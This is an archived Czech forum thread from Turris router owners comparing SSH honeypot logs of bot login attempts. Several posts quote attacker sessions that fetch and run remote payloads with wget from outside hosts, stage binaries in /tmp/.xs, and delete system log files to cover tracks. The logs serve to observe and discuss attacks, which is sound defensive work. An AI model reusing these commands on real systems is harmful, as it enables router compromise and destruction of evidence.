Forum Turris
Fórum Turris Nápověda

Milí majitelé routerů Turris,

toto fórum bylo 9. 12. 2016 zmrazeno a nahrazeno naším novým Turris fórem. Ještě chvíli bude dostupné k prohlížení, ale již zde není možné přispívat. Více informací naleznete v oznámení o uzavření fóra.

Dear Turris routers users,

this forum has been frozen on Dec 9th, 2016 and replaced by our new Turris forum. It will be read-only accessible for some time after. For more information, read the announcement about closing the forum.

Nahoru Téma Veřejnost / Všeobecná diskuse / SSH Honeypot
1 2 Předchozí Následující  
- - Od uzivatel1 (>>) Dne 2015-06-17 07:02 Upraveno 2015-06-17 13:14
Kdo z turristů registruje tento pokus o připojení?

user: root    heslo: cisco

command: ifconfig
              : grep MemFree /proc/meminfo

:grin: vypadá to na pěkný botnet :grin:
Nadřazený - - Od MRHrady Dne 2015-06-17 07:49 Hlasů 1
myslim, že když napíšu všichni tak nebudu daleko od pravdy :grin:
Nadřazený - Od horada (>) Dne 2015-06-17 08:03
Nechá se ten honeypot ze strany CZ.NICu nějak upravovat a přidávat obsluhu dalších příkazů? ... by mě docela zajímalo jestli a co by následovalo, kdyby ten grep MemFree /proc/meminfo prošel...
Nadřazený - Od NONES (>>>) Dne 2015-06-17 09:31
To budete, já to tam třeba nemám. Ale zase mě zlobí jinými příkazy někdo z Holandska. Ale včera byl úplný klid, nechali mě být. :lol:
Nadřazený - Od kolul.mojeid.cz Dne 2015-06-17 14:41 Upraveno 2015-06-24 19:13
Já nemám ani jeden pokus, jen to co jsem testoval sám.

// tak od 19.6 se to rozjelo a 22.6 mam dokonce 14 pokusu:evil:
Nadřazený - Od commar (>>) Dne 2015-06-17 08:13
Vypadá to, že já...

Nadřazený - Od fojtp Dne 2015-06-17 08:49
asi 3x..
Nadřazený - Od lcerny Dne 2015-06-25 07:23
Během 22.6. a 23.6 také hromada pokusů z IP adresy 193.200.227.156 v Polsku.
- - Od Milosh Dne 2015-06-18 20:52
U mě to zkouší někdo z německa, ale jen admin:admin
a příkazy
uname
free -m
ps x
Nadřazený - Od NONES (>>>) Dne 2015-06-19 09:49
Jo, to tam mám taky - a dokonce několikrát. I když, když se podívám na ta hesla a použité příkazy, o moc sofistikovaný útok se nejedná. Spíš taková "rekognoskace terénu"
Nadřazený - Od Milosh Dne 2015-06-22 08:06
Tak po víkendu nové záznamy, z různých zemí ale to samé:

root:cisco

a příkazy

ifconfig
grep MemFree /proc/meminfo

Asi jen průzkum
- - Od Aftanas Dne 2015-06-24 20:52
U mě se jeden pokus lišil:
z 60.24.123.207

Jméno uživatele: root
Heslo: test

$ /etc/init.d/iptables stop  Zamítnuto
$ wget -c http://118.193.207.159:2201/xwl  Přijato
$ reSuSEfirewall2 stop  Zamítnuto
$ SuSEfirewall2 stop  Zamítnuto
$ service iptables stop  Zamítnuto
$ ./xwl  Zamítnuto
$ chmod 777 xwl  Přijato
Nadřazený - - Od JFila (>>) Dne 2015-06-27 08:03 Upraveno 2015-06-27 20:02
Je to možné, že už 6 dní nikdo na náš Turrísek neútočil?:confused: Co Vy ostatní? Jen aby to nebylo nějaké rozbité :lol:.
Nadřazený - - Od commar (>>) Dne 2015-06-27 08:44 Hlasů 1
Také jsem měl pár dní klid, teď je to ale denně.

Já mám jiný problém.
Nejdou mi zobrazit grafy v Safari na iPad2, můžete to někdo vyzkoušet?
Dříve to normálně chodilo, po přidání SSH honeypotu do výpisů to nechodí. Nejde vlevo otevřít výběr grafů.
Pokud to není jen u mě, prosím admina stránek o opravu.
Děkuji.
Nadřazený - - Od Jan Čermák (>>) Dne 2015-06-29 10:03
Do dneška by mě ani nenapadlo, že styly v CSS můžou ovlivňovat chování událostí v DOM, ale zjevně to možné je. Díky za nahlášení, opraveno.
Nadřazený - Od commar (>>) Dne 2015-06-29 10:10
Měl jsem dříve také problém v Opeře 12.17, i když je to dnes už trochu okrajový prohlížeč.
Tam už ale problém taky zmizel.

Díky...
Nadřazený - Od uzivatel1 (>>) Dne 2015-06-27 12:18
Zdravím,  od 26. klid ....
Nadřazený - - Od macros Dne 2015-06-27 12:46
útočí zatím každý den, nejvíc se snažil tady kamarádíček z číny

Nadřazený - - Od JFila (>>) Dne 2015-07-23 06:58
Zajímavé, máte také delší klid od útoků? Na našeho Turríska nikdo neútočil od 11. 7. 2015.
Nadřazený - Od uzivatel1 (>>) Dne 2015-07-23 07:11
Zaznamenávám čilý provoz skoro denně. ( I po nedávné změně veřejné dynamické adresy. )
Nadřazený - Od kolul.mojeid.cz Dne 2015-07-23 07:13
A bezi ti SSH Honeypot? SSH server connectivity test
Nadřazený - - Od NONES (>>>) Dne 2015-07-23 07:27 Hlasů 1
A nesouvisí to s tímto příspěvkem? Také jsem měl pár dnů klid, než jsem náhodou objevil zmíněný příspěvek kolegy, upravil nastavení FW pravidla a všechno se zase opět začalo logovat jako dřív.
Nadřazený - - Od JFila (>>) Dne 2015-07-23 08:12
Vážení, děkuji za rady skutečně to bylo tím, že byla vyplněna vnitřní IP adresa routeru v pravidlech firewallu.
Nadřazený - - Od kolul.mojeid.cz Dne 2015-07-23 12:12
Teď je otázka kolik lidí si myslí, že má funkční SSH Honeypot a po aktualizaci vlastně nemá.:cool:
Nadřazený - Od commar (>>) Dne 2015-07-23 12:32 Hlasů 2
Všichni, výjímka jsou ti co si to tady přečetli. Jako já.
Protože na stránkách dokumentace si toho asi nikdo nevšimne.
Nadřazený - Od MRHrady Dne 2015-07-23 12:51
Taky jsem neměl tak jsem koukal do dokumentace a zjistil kde je chyba.. Pak to den šlo a potom zase nic. Teď jsem honeypot odinstaloval, resnul router, nainstaloval a znova restartoval a snad to funguje... Otázka je jak dlouho to vydrží :D
Nadřazený - - Od jakubskrz Dne 2015-07-23 17:00
No jo, fakt to neběží.. A ano, myslel jsem si, že mi to funguje :grin: Díky za upozornění.
Nadřazený - - Od JFila (>>) Dne 2015-07-23 17:04
Já jsem uvedený post na fóru zahlédl ale měl jsem dojem, že to bude v pořádku. Dokonce to asi nějakou dobu fungovalo. Dokáže někdo vysvětlit, proč je nutné do pravidla IP adresu nezadávat? Vždyť spojení jde zvenku na program běžící na routeru.
Nadřazený - Od commar (>>) Dne 2015-07-23 17:08
Nevím, třeba z důvodu rozdílného nastavení IP adresy routeru u uživatelů
to kašle na adresu a hlídá jen port.
- - Od Milosh Dne 2015-08-24 06:49
Tak si myslím, že se někdo pokoušel už o něco víc, než jen testovat. Pokoušel se spustit nějaký kód:

$ cat >/tmp/.xs/daemon.armv4l.mod  Přijato  23. 8. 2015 18:49:31
$ mkdir /tmp/.xs/  Přijato  23. 8. 2015 18:49:31
$ chmod 777 /tmp/.xs/daemon.armv4l.mod  Přijato  23. 8. 2015 18:50:11
$ /tmp/.xs/daemon.armv4l.mod  Zamítnuto  23. 8. 2015 18:50:12
Nadřazený - - Od uzivatel1 (>>) Dne 2015-08-24 07:23
U mne totéž téměř denně z různých IP po světě. Těmto příkazům vždy předchází test:

Třeba:
23. 8. 2015 23:26  Kanada 65.87.255.142  2 
Jméno uživatele:root Heslo:root

$ echo -n test  Přijato  23. 8. 2015 23:26:59
$ cat /proc/version  Přijato  23. 8. 2015 23:27:00

23. 8. 2015 23:54  Kanada 65.87.255.142  4 
Jméno uživatele:root Heslo:root

$ mkdir /tmp/.xs/  Přijato  23. 8. 2015 23:54:34
$ cat >/tmp/.xs/daemon.armv4l.mod  Přijato  23. 8. 2015 23:54:35
$ chmod 777 /tmp/.xs/daemon.armv4l.mod  Přijato  23. 8. 2015 23:55:04
$ /tmp/.xs/daemon.armv4l.mod  Zamítnuto  23. 8. 2015 23:55:06

Pak totéž s admin > admin
Nadřazený - Od Eskymák (>) Dne 2015-08-24 15:37
Vida, tady už se ti to pokouší nainstalovat. :-)
Nadřazený - - Od Michal Dne 2015-08-24 11:13
tak přidám jeden největší ze včerejška
23. 8. 2015 08:17 185.86.162.31 41 

Jméno uživatele:

root

Heslo:

Hello123

$ ls Přijato 23. 8. 2015 08:17:34
$ wget best1.now.im/1.tar Přijato 23. 8. 2015 08:17:42
$ tar xf 1.tar Přijato 23. 8. 2015 08:17:47
$ rm -rf 1.tar Přijato 23. 8. 2015 08:17:50
$ mv stats/ .stats/ Přijato 23. 8. 2015 08:17:57
$ cd .stats Přijato 23. 8. 2015 08:18:09
$ ls Přijato 23. 8. 2015 08:18:11
$ ls -lia Přijato 23. 8. 2015 08:18:13
$ cd .stats/ Přijato 23. 8. 2015 08:18:24
$ cd Přijato 23. 8. 2015 08:18:28
$ ls Přijato 23. 8. 2015 08:18:30
$ wget best1.now.im/1.tar Přijato 23. 8. 2015 08:18:39
$ tar xf 1.tar Přijato 23. 8. 2015 08:18:48
$ ls Přijato 23. 8. 2015 08:18:50
$ cd stats/ Přijato 23. 8. 2015 08:18:54
$ lls Zamítnuto 23. 8. 2015 08:18:55
$ ls Přijato 23. 8. 2015 08:18:56
$ ls -lia Přijato 23. 8. 2015 08:18:59
$ cd .. Přijato 23. 8. 2015 08:19:05
$ rm -rf stats/ 1.tar Přijato 23. 8. 2015 08:19:11
$ ls Přijato 23. 8. 2015 08:19:13
$ ls -lia Přijato 23. 8. 2015 08:19:15
$ uname -a Přijato 23. 8. 2015 08:19:25
$ perl Přijato 23. 8. 2015 08:19:32
$ wget best1.now.im/1 Přijato 23. 8. 2015 08:19:41
$ perl 1 Přijato 23. 8. 2015 08:19:44
$ perl 1 Přijato 23. 8. 2015 08:20:26
$ perl 1 Přijato 23. 8. 2015 08:20:28
$ perl 1 Přijato 23. 8. 2015 08:20:29
$ ls Přijato 23. 8. 2015 08:20:31
$ rm -rf 1 Přijato 23. 8. 2015 08:20:34
$ rm -rf /var/log/wtmp Přijato 23. 8. 2015 08:20:42
$ rm -rf /var/log/lastlog Přijato 23. 8. 2015 08:20:42
$ rm -rf /var/l og/secure Přijato 23. 8. 2015 08:20:42
$ rm -rf /var/log/xferlog Přijato 23. 8. 2015 08:20:42
$ rm -rf /var/log/messages Přijato 23. 8. 2015 08:20:42
$ rm -rf /var/run /utmp Přijato 23. 8. 2015 08:20:42
$ touch /var/run/utmp Přijato 23. 8. 2015 08:20:42
$ touch /var/log/messages Přijato 23. 8. 2015 08:20:42
$ touch /var/log/wtmp Přijato 23. 8. 2015 08:20:42
$ to uch /var/log/m Zamítnuto 23. 8. 2015 08:20:42

Trvání: [sezení nebylo řádně ukončeno]
Nadřazený - - Od uzivatel1 (>>) Dne 2015-08-24 21:18
Tohle už vypadá na cílený lidský přístup :grin:

Registrujete "oťukávání" ze stejné adresy už před tímto útokem?
Nadřazený - Od Michal Dne 2015-08-25 17:36
tahle adresa je jenom jednou
Nadřazený - - Od Eskymák (>) Dne 2015-08-26 11:59
Útočník bude mít určitě jinou IP, než napadený router, který provedl původní oťukání. :-)
Nadřazený - Od uzivatel1 (>>) Dne 2015-08-26 15:07
Ano, to dává smysl. omg
- - Od Chvatalova Eva Dne 2015-08-29 09:40
Nezobrazí se mi nic v SSH Honepot !
Asi je můj Turrísek imunní proti vpádům cizích " lumpíků " :wink:
Nadřazený - - Od kolul.mojeid.cz Dne 2015-08-29 10:20
A bezi ti SSH Honeypot? SSH server connectivity test:wink:
Nadřazený - - Od Chvatalova Eva Dne 2015-08-29 10:31 Upraveno 2015-08-29 10:37
FAIL Nelze se připojit k 37.221.246.16
ale nevím proč se nejde připojit,když připojení šlape jak hodinky...zas tak dalece tomu nerozumím....
Nadřazený - Od kolul.mojeid.cz Dne 2015-08-29 10:41
Je nastaveno vše podle Návod: SSH honeypot?
- - Od commar (>>) Dne 2015-09-04 07:33
Dnes jsem se podíval na záznamy z SSH Honeypot,
nemám žádné zápisy z období 27.-29.8. a následně 1.-3.9.
Doposud jsem docela dost bombardovaný, máte to někdo podobně?
Pozorujete takové výkyvy?
Například 24.8. mám 32 pokusů.
Nadřazený - Od pari68.mojeid.c Dne 2015-09-04 07:42
Jo, taky jsem na to dneska čučel. Od osmadvacátého ani jeden pokus.
Nadřazený - - Od Jan Čermák (>>) Dne 2015-09-04 07:49
Myslím, že před nedávnem kolega omezil přístup botům, kteří používali triviální kombinaci root/root nebo admin/admin (protože jich bylo neúnosné množství). Nemůže to být tím?
Nadřazený - - Od commar (>>) Dne 2015-09-04 08:31
Tak to bude asi ono, mám tam jen root/cisco...

Proč nás nikdo neinformoval? :grin:
Nadřazený - - Od Jan Čermák (>>) Dne 2015-09-04 08:43 Hlasů 1
Ony ty změny probíhají potajmu, přece to nebudeme útočníkům usnadňovat ;) Ale vážně - příště bysme možná mohli aspoň poslat notifikaci uživatelům přes web, máte pravdu.
Nadřazený - Od commar (>>) Dne 2015-09-04 09:03
To je v pořádku, nemyslel jsem to zle. Mě udivil ten pokles,
napadlo mě, jestli se odesílá vše v pořádku, jestli není problém u mě.
Nadřazený - Od Drx001 Dne 2015-09-04 09:22
Dík za info, taky už jsem na to včera koukal.
- - Od pecival Dne 2015-09-04 11:06 Upraveno 2015-09-04 11:08
prosim vas,
ako/kde si mozem prezriet detaily nejakej ssh sessiony?
v sekcii my router na turris.cz ich sice vidim, ale v dost obmedzenej podobe, napr:

$ ifconfig  Accepted  9/3/2015 20:39:12
$ cat /proc/meminfo  Accepted  9/3/2015 20:39:13
$ cat /proc/version  Accepted  9/3/2015 20:39:15

dost by ma zaujimali pouzite credentials.
resp. v jednej z najdlhsich sessionov sa mi tam bot pokusal zapisat subor pomocou cat...akurat ze je ten input vynechany, takze nevidim, co konkretne utocnik zapisoval:

$ mkdir /tmp/.xs/  Accepted  8/22/2015 23:02:40
$ cat >/tmp/.xs/daemon.armv4l.mod  Accepted  8/22/2015 23:02:41
$ chmod 777 /tmp/.xs/daemon.armv4l.mod  Accepted  8/22/2015 23:02:46

vdaka
Nahoru Téma Veřejnost / Všeobecná diskuse / SSH Honeypot
1 2 Předchozí Následující  

Powered by mwForum 2.29.3 © 1999-2013 Markus Wichitill